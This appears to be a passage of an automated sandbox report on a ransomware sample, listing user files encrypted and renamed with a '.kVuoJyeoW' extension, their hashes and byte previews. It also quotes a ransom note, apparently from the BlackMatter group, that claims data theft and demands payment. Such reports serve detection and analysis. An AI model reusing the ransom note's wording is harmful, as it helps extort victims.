              Preview: .Z.Z..zp..A....A7...d.....:...efM..I.`W.|R>......M...yF)....i....wx@Y'X....X...|....|.}..@L.H ..:.).jj..wO....3.F...,.%....o..D3=m/.. BQ.A...l......I...-....Ztm..B.+$=....*kv......;(....{S.k.v.%7.E...K...._....}FZ...<....a..z...+.u.e..../..`C.$.+>.h,..D..v.6..L.da(..\.n*..W.x$G.P}.....f...m..Ef...l.........n.<.........A....e........&..#..|xw....p....V....q..D..v ...L.2y.r.3GM [c.Z..........!.1nt... .........y>........np..,.L...B5M..o...vh4....C.i.?.6S..a..J..i...h....n%...?.'I+J<!.U...+,._..Kh..i.......w..F...{Ntt.}.B.'.Qo.a.5..........@v..P.a..n.!LO:.o.....N..[..T#.|U....6p.f=%.>U.i..Q]7.iN..."Wd....,z......*....iB.I..$..8..[w..(.dz..4-.6.'.MKp.3.t...x...tY.:8N.x.!Y...^.$.......r..5...z..f....<7B](;(S.3..4..../.2.9gU..og....yu.......l...Qe.O..1.....Cs.."...?..y..<e....[?..>.{.w<m}..Mm...%w...O....o...S...V+.Ya/o_..3:NF..|0*O;yH...R..R...!..w^@K.$...V...r.\......6......L}}.{..`.._:(B.0.-...Iz.'m..+.j....!q...v..|................L..w0I.
              C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.82421423826809
              Encrypted:false
              SSDEEP:24:ZvkZaZL21nu5AB+tpqvzzsfDZjIa4LYJ0cV5ici8ZYK:Z8ZaZWVXbgOa4LrcV56SYK
              MD5:9E559076B0A550FC3B2FFB21757468D2
              SHA1:12EBBA73826BD0A241FAF377CB07FA4F379BEF12
              SHA-256:76E227A7FBF0FE88E6511269E6A35FED6ED9F5694B551D13B42EA870209A03AE
              SHA-512:0DBBDC1B5AB08CDB7A69CC0440939BF5DDC221581D6CCE8DA03A08A5E7887B17D025EFBD7D28C1863BE2B0F2F5D5B2D5FF4C3AF540DDB6D8253D2232704E7413
              Malicious:false
              Preview: .......u....6.(.G..KXY|...wDCB.|.......m....L..y5.AC......8b.c.......6}x....9...../.v.B.$....$...>.O...1N...N._..<,...u)..1+d'-..Xc.2.!v.....GrmJE.7.P..]F.....,..L.x1.."2...sBr..U..u.*i'h....@.~M4&..Y..p.Ta/H .-R..T....3T.....U...[_)g.z._.P.K.+..P|..QKq.......*.N..o%...z...Sb&..W...DS.......,.\#>......g.V."S..X..T...X..R.k.iy..+.J?..`.D|C.F.P.r..b....m..~.Wz....(....e-.Fr...VA.6^....!M-.F.t.....|+fn........&.D....H..U...cei.Wl<.... (d9...*5dK.k...pd.....:.Kep....z%.U.. \...C...F..xt..ko.."....2U!...qR.}qa..p:..x..DA.z.d..T.....^L....j.'...{3.d..S......F.."..GW.....B.1.H..J.......-'..l.q.........5....A9...7..#7. .q.Wq.O..=...H.Sq..^..o%3..@.....'&.]...R..R...&.}.ig........Jh..T..$4.U..."....L......b8p.X..........q .?...~....6x..r.I.i...8)C....9Vo\..'..%q6....X....?..g.fU..c.......4..Gz.$..q..h...6.......(.<Z...I.?.:OL'.....\.L...h'..C..........,Y?9 ....m..HG.~.XzE}.2rWq.WYn.4...E..PV.}.a......-.. ..'.}h.gAU.e.`...n.~[...Q."~..
              C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8269113359752716
              Encrypted:false
              SSDEEP:24:8j+oJW2uPLeeCTQ2dP1RzOEcscxNGA9hm9lyKPBABv3j7wWDS+g:8jXFeJA1pcscxFhmiKPe37g
              MD5:13165D7C06EFCDC6ABFEA7227A8A3A0D
              SHA1:71546DDBAC8E4BCC915B55BB3A78A20BF29492B5
              SHA-256:6BB3B6737BF127815EA7FDD86F72A1627650C99836F3397C3F226B094A61B98B
              SHA-512:91387095517189CE4150DEA49A18B5460DD66CD7804E511F14806DE792EE39C8A81A10125AE0872A86A01EBF92CCD905219CCBC4DB032A69E8C78B1E4EE061BE
              Malicious:false
              Preview: >.U.W....s.J...6.Q.7"a...S..J>0d1.".u.U.Gu.w07..B_..:..7r8.B...h.xg2..1...Jd ...g.3.k!}..k.M...%..k.........S..5V....c.p..2.].9.9.Q.P.X..".......(.......Y(o.:.....`.:.p.E..d_.....[...R....u..Hy...j.j..EzT).H.W.'....7......}.v.9Q..... W.r..#h.v.........5.k.......mF.v.<K.A.....E.....E....z....sz.....XX.K...d.sT..E=.,.gy8....]K1...@.".........N1.{....^)Jz...-P....6.....8...T..!.0._.'/..u9.".... .l...FQW......". ...~....U~......w...#Yw.K..D.N.>w.epK.c...R..0...00e..Zl.be...U.....?@.:b..)#pZ.YB|.X.#....J.W_....[....2.m.h8os.f...._!.s.'.1..34..G.T...F\4...m.Qp.\.s....{...#Jl.<PJFW.9....L..x.....Im.....j"....l..A.&.....j.........%....1..u.'w.....n.ga-T..\.p...t4.,...)...E..x1.Gu){^.6$..j.Q......u.7..G..4...=y..6:A.T..aw...j.....^....C.{.`b%..N..\7.u..S..T..a.8...,%.O..s.iPT..G.H.^?..}....G..+...\x'^......?.....]kU4...v.....W0B*}Q.+.8...Ig:v7.,3.m....>....A....$.....nu...t.A9W.d...AXV..J...N..r...|.Uto ...6...8.*.<...."...K....z.~..p.b..T.q8.2..6..
              C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.827874652862156
              Encrypted:false
              SSDEEP:24:HiW/QG22NiulBXwSZe0+C7oX814kbQ3Mcc41:HiW/QGKSl0M14kSg41
              MD5:E2C3061275A60F769E2B374DBDF462C0
              SHA1:79AC5CBDEFBC0FFE54F30536BC6C59612B04CC45
              SHA-256:5CD0E0745E8D4EEA236398F290ADCAE852004374676EF432897D8C6712F84BB7
              SHA-512:2028783899ADF0A71FA998A8D372F53733E28B189DB24C37BCC81398465BA4D051ACD18554F0BEC95E01FD50E38CC3A09AA44060EFD25DC46CED91F028002C35
              Malicious:false
              Preview: .|-.L!P:....f:I.d.e.z.....z+.q)"......w.(....G....8uZ......\.5..4w..C...y..v3.Qq.*.t.'R_K.(..z.Uv....c.L...f..............U..{....@...r..U.z.=.j..v.....P .6..ES.tq.#....s..7Z............}N.p.>.=..(.#>a<:..t3h...vN%l's...|HN."m.}n.].:.s.^e1.>-..En..r..o...........%....}.D...OE.X..ZD.?..&......w...i(>o.........4...l........[r.}.j..K...]].....J..........r..h.'.xM.. -.1.'.w...!0....$@.0.L..(.q...#h..S.V....J.U.,..U&V....:....97.....k.38..7.ZOL.5...yJ..r....G.D3.....K....,.8.}Z..~k9{.:C..cM.>..........'.j.&..F.p...Co.Zg.A..Ox6D..c/.b.....M.$...........Z.B..G......{.O....S..u.b. 8.-.k"G..}O.......k.......L..n#A^..@L...h...s....:....ahd.2.?..K...0+A..=...8{......f..................C.s.......T.....T.Pi$.kZJ .IJL@..."...F+$=.3.k......Z.%...9.*u.Bd...f..b.<'a.):...-.~..{...v...\j.|.{.m.....UK...+..5.:.x..?.e.R3*..V..?-.{..2x4d..}.yy..<9.&..,].l|...f......wK..U1...Z..G..J...v,..N..[..".&;.&...K ....F@<W...t.e8...|...SKJ.S[...5...a.=.....7.
              C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.817347854063481
              Encrypted:false
              SSDEEP:24:BqO92aZlllk/kpOaREv7aD6t9iVgDHLR4HwqeTU0btZHq5heYy:BqO92gq/ktO7aWLiURpU0brH6m
              MD5:02F7AFEF18D90F7E4F020B049FDFE6AE
              SHA1:789C5D2284C87C229F4A99EB89D49210E6D906E1
              SHA-256:4A98AF485C3FF53EF187FA0FA2F3E92AC4071797E005FAD473E66B2DBA66E434
              SHA-512:835CE2222DFD05C68C63517DD61E28FFE1E979E70888D0FCB7C0C19E3BCECFEA56AEA6DC6DD054CC66A38B5A81927638B3480FBE0CF30172FECAC31CF78DD01B
              Malicious:false
              Preview: .h..-..J.+..v..."....jw...v.1t.......1.A.KH.D....sd7.I;.;$.Y.-F...gA...5.8aY..@.......j.!C.`.F...`.#O......."....U. ..P.b.....(.U...8...P.. .O...j.T.......&._..m.f;....$K..r......+>...u..... l.n..\..P../P.HwA..V.A..~I.a..!......D...S..:...|D.?....S..>;Gf...m.....F.GS_M..a.].....{6o.E...X.V..,..n...7a...t.9e.....-.&y*.U.)hS....S...`{b2...uH.}.1)*..{.....qJ.K5.a.fw.hm..$+....A....JL`..9%.b..[...K....V.=l.BZStk.V ...tJ.7.....;..O]f$...$..A..d......"~t......d.cZ{...B...(.+....;L....7.!T..7$Q..E..y.W.{.E%...X.Ne..sm.I.?.$m!..:,g..O.wu.o.j....@;7...F."........Y.6.}.F.......j....F.(R6~[6...S.Zr.3....Ex...u.3............=....p..H..qFKk....F....w.....(.:q..{...s.Q.3...w^P....j...p1..7...T..................p.....m...ut,.......... @....."~....!>u..x?N(.o...I...f.G....+.F....)#....Uq......&..w....qTb.......wV.`.q./...))..g.d...sa8\..<L(p..w.IY..@.Y...Zj6Z......."6/..I..P.j..Rc.R].G.V.+.f!r..fa..!}0)_...r.C.q...uE.mv..lB....o..|+...tL.Wm?
              C:\Users\user\Documents\QNCYCDFIJJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\SQSJKEBWDT.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.808983541353912
              Encrypted:false
              SSDEEP:24:5vWKPL7rFfQe3tZulxR38W6G3guqqT/nxPi9vaVzd8zIPFr9RdYlLUC8:5vWiLXFfDZulv32EgZqTGav8zIPFJvYQ
              MD5:871333AAE0AF5BE7C582B7AA017CB07B
              SHA1:58333D71A355A2B84F9E7DEA1F39F4C4B508D9DA
              SHA-256:33C5847E2F052412E9325924873471D7537832E5B913CF14F9233835C99DDDBD
              SHA-512:F2886EB8DCBC7BA852151EB3A457CEB1C9052032C93EC0CC8CC702B71C373046546BDD156BD97F1DA42D469479E312FD84F9969F67AB6085CA45BAA27E7CCA85
              Malicious:false
              Preview: ..YT<q.q...q.|........D.....k.t.q.....+G.S.M9.X....`m....'E......M.).8d.+......Y~./...3H.E...Q.x....=BC./.O-H....}W.=F....}.Fi .?.Em).S..".C-..V..%. ...n.4;.z.0..X.....#U1E.3h6....k.....}zZ.a..Xz..y.?.7a...w.;..xu.r...hT....O...S...,d....P.L...p.H.a.[.*_.....U.....AO"W@^..!.[$2....Q..g..o.^.ae..j..9.........H.FO..Z.."7..X0....6MO...P..1.`I.0....(.....G..=.^.pCQ..U../3...39..Z.....h.t1.8.......xM...s..x.#g...4Q...a?_6.$..w......<...c.6.....H........WYV.5.c<+.R.?F....Y..^.*.}"V...M ....j1D(.3..h-...>......fRs9 ./M4...J).$..4..$...fe...RJ.u.".@..k.T.\..n...%...b....tXnV6...Y..|z.q=.M.TC..i|!=.Ua..%:....,.aZ.R...r.>QG.$n)...C..e\...nF9......Z.;.6l...C.....DG0v.u.N?|.......`....D.@..L....v...>..sp...{c.....L......I.k?..|..h.uAR....6..../.Y.U.Y....6%.9..T.{6u....6..u...y..k.-b...u#.?`.~..s:.y..8...ZM.....=....@....v.=..y..Pk..Om...."..*....K.6.<eH...]Mm...sw......A..Q.HJ..^.....d..)..[@......fU.P.7....[./.O.3..5..w.D.........j.p. u..7.y.N..A..
              C:\Users\user\Documents\SUAVTZKNFL.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.822047822206245
              Encrypted:false
              SSDEEP:24:aFDoOwcMyY8fIfLFpEFZYEFhpDJ8Ht0EAkzrkW5Xyi:MD88oJpr0hIHupUrkUXZ
              MD5:50227DF8DEED3096795E6E9923CCBE88
              SHA1:FAAEED9B5B65B3113022CC07DD34177B90B9A564
              SHA-256:2E009E02C9A0FB71785C98278C0A91C20A80C9B2F982B8ECDC786DF4187F528A
              SHA-512:56755E5F71D3CD7A1C423417B05135354D494252F2A21348CD835A5AF05A91C9052AF835DAF4908D93B0F43DB34D17E82A823B624D40D2BB4B92831A5D3C1E8C
              Malicious:false
              Preview: ..;d.=<N... s...%.....s....^..........[!.Y....H,.!_]...S(o'A.q.nA(.../.g..4(.....mI.....?_..&d.6.m....i.K..>.R%.....U.....C-r..:O...^...`Y.......i.`$3..;...UW.W..Q..X.Bv...%...Y@._.b6&..0<. ...b.>........2H.Fs.\Qr..;..}...=..m.}..m.B=.(.i........~....2rd.R.B.}.K.....w-...,..=(.`&.t...]n#..;...Pz0W.7.....'.SZ...+..X_...M....Q....LTQ.....q..t..6..7...`....HqX...'.?.o......y?....4.).p.E.B.p.....#pC.....-}:.|c==Jt.$.D..1_' !.g(.(..%..I\.|.%.........s....kf.........A.,D...u.......W9..`N5..!..cp....&..+4..!......[y.;.z...r.e]O...".(.2R.k..........".d..Y.~....8..Y.U.b...%\S(2,.yB4.M..u.>.Chv...../X.^.y..\......G...}._'.X..p..q..*..4......Vz..PV.,....X..Q.......Nr...z%.ttQ..j.&T....&.....B/P...;G8[.)....b..:J..l.....By"...Q..rO..0UU._..t?|<DJ.@......p....V..T."....g...8./....?..V..r..T'...P..S...Y.........O..G\...9u.....`...k.....A@..3.O.g.E.B.......P!3B.MJ....~.L.%..q...ON....l*.h~I........|...~).[.....`...._.........*p...m..G..g.Kw.......u1b(.&ms.
              C:\Users\user\Documents\SUAVTZKNFL.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.82413726143632
              Encrypted:false
              SSDEEP:24:Sw661OERVWM41qpeHPyI8uOtPAMuuK9/o0TU6rj5NyifKEOt5/0l8o7x4HFgDd:S1IOERVWMnI/OtPRw/oIPyiyEOtR0lVH
              MD5:E67F1B1FF78185C8F5F17AF7F3E9C2B7
              SHA1:DB898CB2E27ACFB754B18E59375E7ECC00A3FC4C
              SHA-256:D36F498A8DB90F3450AD19C10626B62F6727CB950AF423EC3738C13E4499F965
              SHA-512:C880237A2894D21FB0E36A0C03273D64891F2B30CB80923E304F848FF0FA50B15D2AD2D99F82CE2AFF9CB2881905BDBD1877DBA1671FBA413FAA13193CC58D6C
              Malicious:false
              Preview: +..up...=M.0<..-..-....R.9%_.Q....O..!)4.......8...b.,N..|'A.[..^.b".1.n....Yu.|....."2Z.+...0...F6..I.b.J..'..S..|.8...WfV5.~1...*.k.H.d..U6.*Eu}..2...%...I..{e@...<?3..b.Q$.P$...<......_..2.#.U6..n7......+s.Q2..0.Z.D7........%.............M_....BBy{.$.c.'[y......Q=.mA*.&..Z.N...,.J.../.7.~......@ .=...\..nG.J.@.S.w#..^DS4..#...fV.g...:.._...v.~*....6B....XJ......T..,..uH.#I.gn.+N..<.....C...@..m..eayU.X..6......[?,+p../..we.:}g.....h..-C.....i.u]{.d.h.vw.1Qj..........?.l.w'.|h....K.7.-['..Za.&.t.W.Q.3".x.v...N.:....~T....[^..c6......r....f.C.(...O.5w..K`xH%.>L.R....C.....K....n"Z9P+...m.H$..#.......a.ms.Rf{f..Y+...L!.0...7.....<?PC.P.....8.kD~.2_.[. .2.G$.<,. *.N......Wrb.s....;.......cI.A..KaQc[3.W......|.S...j.?)sL.....J..x...".7..x....[<W....n..&g{.".1.~.+FLA<%..j.F.X>.7..D.5...u.W.-....i7..uo.o..#-..@..r....<v.V5....#3....^.......:Y.C..V;.$G.w..s.^.C.d.}/:.XP..../Q7.n.W\.......9...)z.?.q.n..]=...6%.<.[..........l.<....E..H...7.
              C:\Users\user\Documents\SUAVTZKNFL.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.832441808556859
              Encrypted:false
              SSDEEP:24:Ud1OxsrSyy4LgOR36EByeYrfZ5qg432vzKTLyMV9ojTzDf3RGsSD+:ocxsrBhJAiyeYrKfSKTGw9ojTPhGZ6
              MD5:E556EFD0DCD039F48BFE62292D73C720
              SHA1:B50EE0FCBCF673B0B9D4D048498F6EE216DAE3CB
              SHA-256:090701AAAD3ADB6EF8C57D435A2B32CE802419883D4022393B933EECB4AB2DEB
              SHA-512:F4BEE40ECCFBAB3E358AF12A5CC9BF21F5C9AFEDE9ABA984A6869C3C09199DB021BA3703F138658221ABD01E6ED1F8C85D932C56ED77021D3C3CB48D441A9DBE
              Malicious:false
              Preview: .<{z.Cv.1J..Y8.@..........6.h8....:.S5.v...$.a.I/\....M:....%..,.:....z..(...uUSj... ..I.n.3.2.Z...fn.S....*B.%....e.s....+t........V....89I...S...Fc........B.&.(..7.E~...x.d[j.y7./..)]....L.\^.....C.z..W..E$..>(.9..q....2Ld.E.......sJ.#... ..Q.bQ...[t.,.~viU..*E.Z./.<..hv...?3....|.[...........^%...Y.j.;......w.....$8....2/.W."......0)!..y.x.bqa...?Lmc.`m (zk/3.L..Y.g[H...lL..B.cn........QaZ{.FK...& ...u.@A....d.%_...N.....T...<Dr.pX.NF-B`7.J.....p.a..........Ud..".......X.5.d Le...^.N......'5..y%m..N.A.}H.N.|..7$B.aa.M..l...`.1.._.Q../......<..E.....O.x..U.^S$sd..A.x.&..l$H....C.Y.".p.\.p...a.P..@.I.#*..a]J..W9PZX.2J.....o7<.$:z.T.......C......)v.p2e.x...-%.u....o...>......=.....xU?*.........l#..........?...b..|...".m?'..1.M..P5.L.G..W...0..=..O..m..Z.....A.Z.*.........j.+.F.v.%D(.{W..y.......^...r...5..h......"MU...t.=4....N.3.|...mZl.....s....S..T...u$]....k....#...Z.g....W....i...%..A..O..z.I.~A.B.i..|.q..}..S0]...+...ZE.....KK|....
              C:\Users\user\Documents\ZGGKNSUKOP.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.835832341949409
              Encrypted:false
              SSDEEP:24:2Y4PXadNI4BN7i6Qa4NC4wNCC62lmPggbuJt/ODb7JWBDTs2Yh7Xp:J4SdNISsQmY0Rbqt/0b7J+B2Xp
              MD5:55FA7989AB292CC131DD77CFBC8655F8
              SHA1:4F4EF4149CF4830C43E1AE0CB4413F3446376E95
              SHA-256:77E85D3268AECF944A6BD528D6544BA4DDBB6909873790BC0901C45DAFA53BFD
              SHA-512:7C3DF601A181D39A8F279080D8301EB23802156D373D399F1A3A358134643A01170932FAC5C86C5B6C93CBF33F5012633A73671A3835E94F7A6F1C0DAFBEB7E3
              Malicious:false
              Preview: ..m.U.(.&..y8....55.a.$l...W9o.\.,cz.FO..H.Q;l...k.....8F.....Y...a...~@.]p.......4.....yl.XZRqm.....j..v.z].....,R..Z.....A.z..7...../....*,*..;....x...~...R...b..".n...z{/l....2..4>I._*;.z./.oG).xN...Uc..._.u....b....Z..=..p.....[0...u.o..S..s....q<.$?2Z..Nl..UK.Y,.....%...Q...G.B=.~M......IG...C_..9k.5..$Z.(.`.V.HnUj..Z._..e....."...`.F.I....!=.!.Y.0....=A..|..._..r.s9..;d...ScP%......5;.......x.o.;...yE..tb..(p..?4..f........b.&...@.3.(..:.f..mKidG.+.9S..^..l..cc..........i...s.~<.B.o...:..Y...u....xc....u...r>R.R..0R{r....k?~.........:c..)....8...=...W.g..N...5......GH)......2...7..m...\3.a8.O...7.4............N....... ...01.9...j...$......mb3..?.2..|...Rc.....x.......j.e3..-R.S<..^Z4.w.y.0y...p3..)..cB`.;b.e.*..y(.9..dh.L....e|.B..$^....D.G..NXXM*.#...;l.[..}..W.i.{.`.Y.)....&....2M..88..D.....q~.....q...$.?..i.U.N.;..a.DJ.%W.X_..`.aO.J#=...h%H...R.B46D;.....o...&.s...=.b..t...O."...../.U.=bi.s.xu#.<...H.........7.vEo.p.'z..
              C:\Users\user\Documents\ZQIXMVQGAH.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.811030703459247
              Encrypted:false
              SSDEEP:24:D6VNq/K+s+/zD4+bjZqLR8jb0LQsmrkQAwARQxQnMtVYRU0:WNqCD+/zD4KYLRabNJb7ARQxKMtKH
              MD5:D3707844792D8AEA93B585920B9D7C3A
              SHA1:14F620EFB80E296BD955C8E3651AFF2357C3E804
              SHA-256:7C8AD3F3303488F4D0B0FCC2E4413E556B409FDE01F94AC61BA811ED7E425D04
              SHA-512:F83D992D82E43A28CA7C36E611D82E74BEE6B2E127B59A7FFB5C51F9F7C1C75C8FDFE686A29EE3CA00B331DB7EAA66FCA878452C9B37307B5D62AEC8F1E93FE4
              Malicious:false
              Preview: ..|.6..l.9Q..-.8r..6@..d%.v;].&..."b..../B.....|.1.h.....Xvb..0.E....rA.X.sW.b4I...p.......x..G.cJd.....*...%..Lc.t...uJ..X.D.E..dA.X.L.hZ.3....|.....{...N........v.......=..._.9s.d.k".ZA'..%@.K*...Ok;.t..aY...."..-..S.F..>......{....*V.<......M..C....l.....|.)..l....a...%.../..g.y.*.........%t.@....!|.:..q.A..._..qO.C. &.n...,NR[*../V.<.6'..0..'m...\.$.r.u...$PMsX.Y.)g..tK d.a.M..ql`.+'.-.rX...k.a...._....*.dh..S.{.6.O..I......i?.....g.Y,.*....)....p..9..[o5.#F.`?......oq..7.4.....9sQE........I..R.".4mG.....6..~.?./N..9..>.A.y~Q..V..#S......O.u.P..K......kH.R{.[.C...;.T...V...~..R*...ONZ..^`1._.DUC|:5..,..}..#H7.~....Wi..8Ed.(b;h5.Y..q=.@..W...........%...=.=..'Di.Kp.;iR.7l...*....s ^.M.+..S....V.G..}.m...bE...+.#/.t....y.....?W.....S.$N.V..ZB{W..Yn..ur.....Nt~.U.w.,ZE|..5.%...l.O6..0.\... .]$.O.......T?...%.xD...j...I..X.\.h...7D6..B.......c8...(..\`....s1.......}p....(...#.6.&..L7z..s.K.;.C.>.............z.b.{N/.8...6I..}.zZ...
              C:\Users\user\Documents\ZQIXMVQGAH\GAOBCVIQIJ.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.845370549639035
              Encrypted:false
              SSDEEP:24:q9FQnL80jC4JOG4HgcYSUNo+3XdCORxrtr1Q9TjnMjroCgl8:ZL80jC4IGNcsV3Ioxa6rPgm
              MD5:3206A64ABF841B2C989AAD288C0CC8FF
              SHA1:07CF4DB3962610EB5526B6DE9AE5671087853DAE
              SHA-256:C0BAEF15BE58E0735A3A3C21664EC4204C863C92439ABFF3ABD39305CDCA53A3
              SHA-512:E2D12426D0D4C0985213A6A07DDCE5F32612F9F4A98B2592728DF39458F8B43C1EADBEDBF4B3C5A23C95780B8BDA2303F95563707E0ED9253D1F49EF6C0FE975
              Malicious:false
              Preview: ...&.R...M..p.H..\.T. .\.h..]..Y.|...H~G...b....x%.....5%.Z./....!wsx..3$+...=..NV...x,(...Xa.e@i.,or..;..*..1.4;..q9.-.,.1C.......Qu..9.,qV.9|....pF:,AP.!.FQ......J{..-p.....l.. ...C..!h..#l..j....P.qK{.e....I......8...[6...|^Z=.....cz..9....5)..]..ho`.P..s..<..=..`?...=.F1.E.. ....c..G...../g. .....<.q.t...%...7....qo.......b.I7...'9...tG.K...:._^..=..2.h...Q.:F...N.....S...P{/.%..........V.-~...Y'.?.mC....2..J.N..3.[....-..J..0.9r....k.Mf...c....e.D....#J.....|....R.. .......+..l..:1-....`...Tv.......,..&..@...c-v:mlD.wQ...!.FC.. xR...s.c.r...&1....Vr..[*....t.......q.W..nu.S...9...F.....9.#1...U<...'....=..I.{..6T..2h..+fw.........9EKqCM.Smv...-x.<....._S.(.9.....~..5...x.....Q.BNw...3.l2......t.tG..V....P..Lq...~p57.dFn3u..,....$p........N...........6C.w.Pp......V.;m...t....&1.S0"..XY0.?..w{.$ 9.......e_..Aen...G........ ....5.....R.`....^..3;..o..A.B.j)..O..6p..|.~u../..H.x..f.......b`..f....:....W.._.R.f...gM.um.|.T....q...D3,...p.,..l.@
              C:\Users\user\Documents\ZQIXMVQGAH\PWCCAWLGRE.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.83244355916098
              Encrypted:false
              SSDEEP:24:Eg5svOh7S10FCvzijlYuH7ik9pvUSSu8qiOeoE957bReu4i4C:Q87VcLOf9p8uliOI5Zeu4y
              MD5:8C6779BAC96B641972CB23DCF58D41AB
              SHA1:B88981D71F53DB2400F2819431BD43BB2EDAB9BD
              SHA-256:B57D9681C42A7266C671215F6919746C67895510A21DF49830ADB188D436ED3A
              SHA-512:D2FD5CA968DE5E203B38EA93C5E2CC63F7334AF7BA31F0B3091C13645C22A97B3B901585A066C285A3D1300BA7CB6C79D75C5E8AF684DD84162D8F60272C50DD
              Malicious:false
              Preview: .A..(E.%8+lk}bD.A..,.r.jg.9X.-4...D.6./..e..y....`\{.G.F.Q..k*.};k......:t`..0I..E.]o.s.f.$l.'C..<#@....A..-S.....:.fO.{.w....,..KMy.s.....|K+<\.&../..@.p....n...$...7..s.Y.`.G.Zbvo.:$_..w.g.=.V3t..p...q..&.S....~...%N...BO.A...I.....A..oI.a..vh.....u#......n.gdlr..?]S@Ds......FF..1b@...|..r....[Glc.jf;.F..o.u...G'....\.../.#..PJIz...3...[^;..vW'F...P(.....+..\.1p.,A+.@...-....e.".....^&...A.@.A.....-&$./,.5.N....G......G..r.BZ...t.m...O.(Q..C.....R.7~...k".....L......R.\.S.H......Q...P;..Vib .....I|ls..=.4.....u._b.Lw... ..[:..7..K.N.......8.<k.u....../!...1....5J..Z..1..P....E.)/..|.C,H.......{.r*...^n-...]V......c......u.R.^.J..Z.C...W..vq*....k.D.]...$.....M..dM..Q(...|.......xv....6^.z..g....j.$...j.YK...^..0N.[...w.)..A.w1..o)Z&.<#O?r.w.NHWd..E..jv.g...BRx.x..R.v....d...U..X............[LT.;a.fU........V.5%....N~j.`D.S...{.Z...1.y.-%j....-..l....r.Ot.a.c...L*....e.1..:..&.Y}.8\.)..K2.!.Z...@......xO}.|1....g.-."LIn. ;.!...2.
              C:\Users\user\Documents\ZQIXMVQGAH\QCFWYSKMHA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.836548154651542
              Encrypted:false
              SSDEEP:24:Y2/A359obCIm6Xz8e4YapJzlTvUvti/0S+L52tEjlXxIg:YzvGVj8H/JzJcFiMPxj9l
              MD5:C08DBA61259325EADE2BB9D36B9A354F
              SHA1:9E05DE4D788543D20FEC0118335A0AA707F4E1C5
              SHA-256:5CB7B4B1A4A215AE85728E17AB89E2DAFFE8B9CA786FF280C6FFF67BBB790500
              SHA-512:EBE1A30698A19992E2C095031C669EBCC22217CE4E457EE9F81DBEE90778B4BF09BDBC5F76053A92ECC50DCC149FB6D55717FF626C4A797FE2344FB01B32D4B6
              Malicious:false
